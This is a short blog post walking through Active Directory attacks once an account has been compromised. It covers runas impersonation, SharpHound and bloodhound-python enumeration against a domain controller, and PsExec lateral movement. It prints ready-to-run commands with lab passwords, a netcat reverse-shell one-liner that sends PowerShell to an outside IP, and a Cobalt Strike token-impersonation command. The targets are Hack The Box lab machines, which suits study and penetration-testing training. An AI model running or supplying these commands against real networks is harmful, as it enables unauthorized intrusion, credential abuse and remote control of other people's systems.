Enumerate Active Directory(AD) remotely with any valid user account credentials.(runas and PsExec), Lateral movement

n00πŸ”‘
3 min readDec 27, 2020

Method 1(Requires Windows machine):

Prerequisite: Credentials for at least one account which you compromised.(support:#00^BlackKnight) in this demo example.

Okay lets check whether we can get RCE via smb or via winrm using crackmapexec.

As you can see, we are not allowed to get RCE nor via smb neither via winrm.

If you are allowed to run commands remotely crackmapexec will show pwned!. Now in this case when you are exhausted enumerating LDAP,SMB,kerberos etc. but didn’t found something interesting. We can impersonate as a valid AD user using runas command in windows.

runas /netonly /user:BLACKFIELD.local\support powershell

runas /netonly /user:<FQDN>\<username> powershell

Impersonating user

Then we can run sharphound remotely to query AD infomation

.\SharpHound.exe -c all -d BLACKFIELD.local --domaincontroller 10.10.10.192

.\SharpHound.exe -c <Collection-Method> -d <FQDN> β€” -domaincontroller <DC-IP>

Now we can proceed with further enumeration with nice GUI in Bloodhound. Just drag and drop the ******_Bloodhound.zip file.

Or we can use powershell module as well

. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

Method 2:

Prerequisite: Credentials for atleast one account which you compromised.(james@htb.local:J@m3s_P@ssW0rd!) in this demo example.

There is a python version of bloodhound which can be used from linux also(All collection methods ae not present in this).

pip install bloodhound

The installation will add a command line tool bloodhound-python to your PATH.

bloodhound-python -c all -u james -p 'J@m3s_P@ssW0rd!'  -ns 10.10.10.52 -d htb.local --zipbloodhound-python -c <collection method> -u <username> -p <password>  -ns <dns-server> -d <domain> --zip

Drag and drop all these files to bloodhound.

β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€” β€”

Running binaries as other users-

For example getting reverse shell as user user, is possible if we know the credentials(user:password321).

.\PsExec64.exe -accepteula -u user -p password321 C:\Users\admin\Desktop\nc64.exe 192.0.0.7 53 -e powershell.\PsExec64.exe \\target-ip -accepteula -u user -p password powershell.exe
# beacon> make_token DEV\nlamb F3rrari
beacon> make_token <domain\username> <password>

Thank you for reading! I hope this might help you.

Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)

--

--